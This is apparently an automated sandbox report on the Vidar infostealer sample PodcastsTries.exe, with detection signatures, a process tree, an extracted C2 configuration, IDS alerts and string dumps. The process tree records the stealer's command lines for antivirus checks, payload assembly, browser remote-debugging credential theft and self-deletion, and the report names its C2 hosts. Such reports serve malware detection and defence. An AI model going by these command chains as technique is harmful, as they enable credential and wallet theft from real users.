Windows Analysis Report
PodcastsTries.exe

Overview

General Information

Sample name: PodcastsTries.exe
Analysis ID: 1580498
MD5: 20bef33e4a0add922ae043e2aed13ea2
SHA1: 4d0353be8234f56862b7ea7ece4ded3eeef91cbb
SHA256: 847c28adfa050608203f206d31cce27f1f27e89ab138908473c8c69ccf388ca2
Tags: exe, user-Brad_malware

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PodcastsTries.exe (PID: 3744 cmdline: "C:\Users\user\Desktop\PodcastsTries.exe" MD5: 20BEF33E4A0ADD922AE043E2AED13EA2)
    • cmd.exe (PID: 4236 cmdline: "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6244 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5344 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5176 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5756 cmdline: cmd /c md 680662 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6500 cmdline: extrac32 /Y /E Memo MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2024 cmdline: findstr /V "OBTAINING" Compensation MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6524 cmdline: cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Billion.com (PID: 1396 cmdline: Billion.com T MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 2672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 3268 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
          • msedge.exe (PID: 1804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 4392 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
          • msedge.exe (PID: 1268 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • cmd.exe (PID: 7804 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7856 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 6036 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 2268 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 2740 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • msedge.exe (PID: 6524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5864 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 728 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 5004 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 5664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
12.2.Billion.com.4390000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
12.2.Billion.com.4390000.1.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io | (listed below)
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                System Summary

                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Billion.com T, ParentImage: C:\Users\user\AppData\Local\Temp\680662\Billion.com, ParentProcessId: 1396, ParentProcessName: Billion.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2672, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4236, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5176, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T19:27:49.377028+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.6 | 49818 | TCP
2024-12-24T19:27:51.679968+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.6 | 49824 | TCP
2024-12-24T19:27:47.008486+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.6 | 49812 | 188.245.216.205 | 443 | TCP
2024-12-24T19:27:44.693699+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49806 | 188.245.216.205 | 443 | TCP

                AV Detection

                Source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 85.0% probability
                Source: PodcastsTries.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49841 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49936 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50110 version: TLS 1.2
                Source: PodcastsTries.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019DC54
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA087
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA1E2
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0019E472
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_001AA570
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0016C622 FindFirstFileExW,12_2_0016C622
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A66DC FindFirstFileW,FindNextFileW,FindClose,12_2_001A66DC
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A7333 FindFirstFileW,FindClose,12_2_001A7333
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001A73D4
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\680662Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\680662\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                Networking

                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49812 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.6:49824
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49806 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.6:49818
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 20.189.173.2 20.189.173.2
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AD889 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_001AD889
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.dr | String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log3.27.dr | String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log3.27.dr | String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log3.27.dr | String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2809276901.00002780002D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global traffic | DNS traffic detected: DNS query: NsxXzupCMoDsL.NsxXzupCMoDsL
                Source: global traffic | DNS traffic detected: DNS query: t.me
                Source: global traffic | DNS traffic detected: DNS query: bijutr.shop
                Source: global traffic | DNS traffic detected: DNS query: www.google.com
                Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
                Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
                Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
                Source: global traffic | DNS traffic detected: DNS query: c.msn.com
                Source: global traffic | DNS traffic detected: DNS query: api.msn.com
                Source: unknown | HTTP traffic detected:
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----3E3OP8QIMOZUAIMOHVS2
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: bijutr.shop
                    Content-Length: 256
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375C
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/55353
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809920479.00002780004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809920479.00002780004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2876579920.000026600038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2876579920.000026600038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
